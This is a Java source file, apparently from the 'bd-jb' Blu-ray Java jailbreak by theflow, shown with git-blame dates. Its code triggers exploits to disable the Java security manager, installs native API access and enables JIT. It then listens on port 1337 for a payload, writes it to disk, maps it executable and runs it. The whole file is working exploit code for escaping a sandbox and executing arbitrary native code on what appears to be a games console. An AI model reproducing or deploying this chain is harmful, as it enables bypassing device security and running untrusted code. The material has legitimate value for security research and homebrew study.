bd-jb/com/bdjb/Exploit.java

94 lines
2.5 KiB
Java
Raw Normal View History

2021-10-24 11:23:44 -04:00
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
2021-10-25 03:47:12 -04:00
import java.net.InetAddress;
2021-10-24 11:23:44 -04:00
import java.net.ServerSocket;
2021-10-27 12:14:29 -04:00
import java.net.Socket;
2021-10-24 11:23:44 -04:00
class Exploit implements Runnable {
static void init() {
Screen.println("[+] bd-jb by theflow");
Screen.println("[*] Disabling security manager...");
ExploitInterface[] exploits =
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
for (int i = 0; i < exploits.length; i++) {
try {
exploits[i].trigger();
if (System.getSecurityManager() == null) {
break;
}
} catch (Exception e) {
continue;
}
}
if (System.getSecurityManager() != null) {
Screen.println("[-] Error could not disable security manager.");
}
}
static void start() {
new Thread(new Exploit()).start();
}
public void run() {
if (System.getSecurityManager() != null) {
return;
}
try {
Screen.println("[*] Installing native API...");
API api = API.getInstance();
Screen.println("[*] Enabling JIT...");
JIT jit = JIT.getInstance();
2021-10-25 03:47:12 -04:00
Screen.println(
"[*] Listening for payload on "
+ InetAddress.getLocalHost().getHostAddress()
+ ":1337...");
2021-10-24 11:23:44 -04:00
ServerSocket serverSocket = new ServerSocket(1337);
Socket socket = serverSocket.accept();
Screen.println("[*] Downloading payload...");
InputStream inputStream = socket.getInputStream();
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
outputStream.close();
inputStream.close();
socket.close();
2021-10-27 15:12:07 -04:00
Screen.println("[*] Mapping payload...");
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
2021-10-27 15:12:07 -04:00
Screen.println("[+] payload: " + Long.toHexString(payload));
Screen.println("[*] Executing payload...");
2021-10-25 03:47:12 -04:00
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
Screen.println("[+] Result: " + ret);
2021-10-24 11:23:44 -04:00
} catch (Exception e) {
Screen.println("[-] Error: " + e.getMessage());
2021-10-24 11:23:44 -04:00
}
}
}